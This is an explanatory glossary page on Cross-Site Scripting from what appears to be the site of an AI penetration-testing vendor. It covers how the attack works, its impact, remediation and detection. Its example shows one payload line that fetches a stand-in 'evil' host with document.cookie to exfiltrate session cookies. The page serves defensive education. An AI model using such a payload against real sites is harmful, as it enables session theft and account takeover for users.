IDORSSRFAUTH BYPASSJWT FORGERYRACE CONDITIONXXEBROKEN OBJECT-LEVEL AUTHPRIVILEGE ESCALATIONMASS ASSIGNMENTGRAPHQL INTROSPECTION ABUSEIDORSSRFAUTH BYPASSJWT FORGERYRACE CONDITIONXXEBROKEN OBJECT-LEVEL AUTHPRIVILEGE ESCALATIONMASS ASSIGNMENTGRAPHQL INTROSPECTION ABUSE
Impactr Logoimpactr
FeaturesHow it worksEvidencePricingLearnCompare
  1. Home
  2. Learn
  3. Cross-Site Scripting (XSS)
InjectionHigh

Cross-Site Scripting (XSS)

Also known as: XSS

Cross-Site Scripting (XSS) is a client-side injection flaw in which an application includes untrusted data in a web page without proper escaping or sanitization, causing a victim's browser to execute attacker-controlled script. XSS comes in reflected, stored, and DOM-based variants, and can lead to session theft, account takeover, and full compromise of the user's session context.

CWE
CWE-79
OWASP
A03:2021
CAPEC
CAPEC-63

How it works

  1. 1Untrusted input reaches an HTML, attribute, JavaScript, or URL context without correct encoding.
  2. 2The browser parses the injected markup or script as part of the trusted page.
  3. 3The payload runs with the victim's privileges - reading the DOM, cookies, or tokens.
  4. 4The attacker exfiltrates session data or performs actions as the victim.

Example

<!-- Reflected value rendered without encoding -->
<div>Results for: <%= query %></div>

<!-- query = <script>fetch('//evil/'+document.cookie)</script> -->
Unencoded reflection of a search term into HTML context.

Impact

XSS enables session hijacking, credential theft, keylogging, phishing within a trusted origin, and can pivot to CSRF-style actions or admin-panel takeover.

Remediation

  • Context-aware output encoding for HTML, attribute, JavaScript, and URL contexts.
  • Deploy a strict Content-Security-Policy to reduce impact of any residual injection.
  • Use frameworks that auto-escape by default and avoid dangerous sinks (innerHTML, dangerouslySetInnerHTML).
  • Sanitize rich text with a vetted library (e.g. DOMPurify) on the correct side.

Detection & testing

Probe every reflection point across HTML, attribute, and script contexts; test stored inputs end-to-end; and review DOM sinks for client-side XSS. Validate with a non-destructive proof.

Impactr tests for Cross-Site Scripting (XSS) the way an attacker would - investigating, chaining it with related flaws, and proving impact with a reproducible exploit before it reaches your report.

Test my app for XSS

Tools

ImpactrBurp SuiteOWASP ZAPDOMPurify (defense)

Frequently asked questions

What is the difference between reflected, stored, and DOM XSS?

Reflected XSS echoes input from the current request; stored XSS persists the payload server-side and serves it to other users; DOM XSS happens entirely in client-side JavaScript that writes untrusted data into a dangerous sink.

Does a Content-Security-Policy replace output encoding?

No. CSP is defense-in-depth that limits impact, but correct, context-aware output encoding remains the primary control against XSS.

Related concepts

Cross-Site Request Forgery (CSRF)SQL Injection (SQLi)Server-Side Template Injection (SSTI)
← All vulnerabilities
Impactr Logoimpactr

Built by hackers, for the code you ship. Autonomous AI penetration testing for modern web apps and APIs.

© 2026 Impactr

Product

FeaturesCoverageUse casesEvidencePricingWaitlist

Resources

VulnerabilitiesGuidesComparisonsGlossaryCWE databaseBy industryBy languageHTTP status codesSecurity headers

Company

ContactTwitterLinkedInGitHub